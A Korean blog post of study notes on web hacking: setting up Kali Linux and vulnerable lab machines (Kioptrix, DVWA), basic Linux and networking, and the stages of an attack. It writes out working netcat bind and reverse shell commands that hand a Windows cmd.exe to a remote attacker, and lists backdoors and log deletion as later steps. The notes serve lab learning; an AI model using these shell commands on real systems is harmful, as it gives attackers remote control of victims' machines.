본문 바로가기
Security

Web hacking 전체적인 그림

by leopard4 2023. 1. 25.

# 환경

가상머신 (버츄얼박스이용) 가상화 ON

칼리리눅스 버츄얼박스 버전 이용 

 

# 버츄얼 셋팅

칼리리눅스 가져오기

usb1.1 (2.0 가끔에러)

네트워크 브릿지

환경설정 - 가상머신 - 호스트 키 조합 shift ctrl

 

# 칼리리눅스 셋팅

ifconfig 아이피로 연결이 되었는지 확인.

ping 8.8.8.8 데이터 정상적으로 나가는지 확인

-루트 계정 접속

$ sudo su - 

기본 pass = kali

passwd (새로운 비밀번호)

-$ apt-get update

poweroff(종료)

 id root

pass입력(접속)

 

# 타겟 설정(취약한서버1)

kioptrix: LEVEL 1 (연습사이트) 다운

버츄얼박스 가상 하드디스크 추가안함 

설정 - 디스크(다운받은파일)- 네트워크(브리지)

 

# 취약한 서버2 설정

vulnhub dvwa   (iso다운로드) 

리눅스

ifconfig

eth0 아이피확인

크롬 주소로 입력

admin 

password

 

# 자주쓰는 리눅스 명령어 

cat (파일이름)                         (파일열기)

mv (파일) (옮길위치) / (바꿀꺼면 바꿀이름)

ls / (최상위 디렉토리확인)

cp (대상파일) (복사할이름)

rm -rf(파일과 디렉토리를 통으로 강제삭제)

명령어 상세확인 man (명령어)

 

# 리눅스 적응 (워게임)

overthewire bandit 사이트

putty 호스트  포트 설정

폰트 설정

 

# 네트워크 개념

nat  컴퓨터 안에 새로운 네트워크를 만든다.( 다른 와이파이 기기와 통신불가)

브릿지 와이파이에 다른 기기들과 같은 레벨로 생성되는것( 같은공유기에 묶여서 통신가능)

 

# 칼리리눅스 열려진 포트 확인

netstat -ant

service apache2 start (웹서비스)

80 열린것 확인.

 

# 바인드 쉘 (피해자시스템에서 포트를 열어두고 공격자가 접속하는것)

(방화벽에서 차단이 잘됨)

NcatPortable  (깃허브)

ncat.exe -nlvp 7777 -e cmd.exe (  이 시스템에서 7777포트를 열고 7777포트로 연결이 들어오는 시스템에게 cmd를 실행시켜서 건내주겠다는것)

-칼리리눅스에서

nc -nv (포트를 개방한 시스템의 아이피) (포트)

 

# 리버스쉘 (바인드쉘과 반대로)

방화벽을 뚫기가 어려우므로 서버로 접속을 유도한다

칼리리눅스에서 nc -nlvp 7777 (포트를열고 접속을 기다린다)

 

!!!!피해자 pc 에서 ncat.exe -nv (서버의아이피) 7777 -e cmd.exe 라는 명령어를 실행하게 만드는것!!!

(이것이 보통해커들이 생각하는 해킹)

 

 

 

# 절차

1. 정보수집 (사전조사)

passive 방법

osint(흥신소)

칼리로 dns 의 아이피주소를 알아내는 유틸

apt install dnsutils

nslookup

> www.google.com  

구글 ip주소가 나옴

 ip location  사이트에 붙혀넣기

(서버의 지리적 위치가 나옴)

 

recon-ng(오픈 웹정찰 도구) 실행

marketplace install all (모든모듈설치)

help (명령어나옴)

 

 

active 방법 (흔적이 남으나 확실함)

포트스캐닝 

 

2.서비스분석

3. Exploit (취약점을 이용하여 shell 획득)

모든 버그가 취약점은 아님.

4. Post Exploit (관리자권한, 백도어, 인근 내부 네트워크로 침입)

5. house cleaning (흔적제거)

로그파일 제거 

 

 

해킹 피해

1.계정탈취

2.데이터탈취

3.협박(랜섬웨어)

4.서비스 거부공격(네트워크 트래픽을 이용할수도 있음)

5.단말기 장악(채굴, 좀비pc)